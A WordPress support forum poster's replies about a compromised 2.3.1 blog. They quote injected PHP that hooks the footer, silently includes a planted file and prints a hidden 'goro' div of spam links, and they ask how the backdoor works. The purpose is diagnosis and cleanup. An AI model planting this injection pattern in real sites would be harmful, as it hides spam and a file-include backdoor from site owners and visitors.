aspender
Forum Replies Created
-
Forum: Fixing WordPress
In reply to: 2.3.1 vulnerabilityJust to be clear, the following got inserted into my page footer:
add_action(‘wp_footer’,’wpc7c16b8466d864eeefd20050625c7775′);
function wpc7c16b8466d864eeefd20050625c7775() {
@include(‘./wp-includes/class-mail.php’);
if(sizeof($wparr)>0){
echo “<div id=\”goro\”>”;
foreach($wparr as $k=>$v){
echo ““.ucwords($v[‘key’]).”\n”;
if($i++==$inum) break;
}
echo “</div>”.$_footer;
}
}However after googling for the goro div and finding some results on these forums, what appears to be different in this case is that wp-includes/default_filters.php was the file that included the hack, not a theme.
Forum: Fixing WordPress
In reply to: 2.3.1 vulnerabilityThe hack above has happened again on my 2.3.1 blog. Again my host has confirmed that there wasn’t any successful ftp logins on or around the date that class-mail.php was placed on the server.
This page seems to have information about how to get rid of the hack, suggesting it has been seen elsewhere:
FYI, I am running WP 2.3.1 with the Tranquility 1.2 theme and the following plugins activated:
Askimet 2.0.2
DupPrevent 1.0
Feedburner Feedsmith 2.3
Google Search Widget 1.0
Google XML Sitemaps 3.0.1
ShareThis 2.0
Ultimate Google Analytics 1.5.3Site is at http://adrianspender.com/blog I have removed the hack.
Can anybody else confirm they have seen this or give any reasonable explanation as to how the backdoor works?
Forum: Fixing WordPress
In reply to: 2.3.1 vulnerabilityMy host confirms that there were a number of attempted FTP logins from a Chinese IP on the day of the hack, but none of them were successful.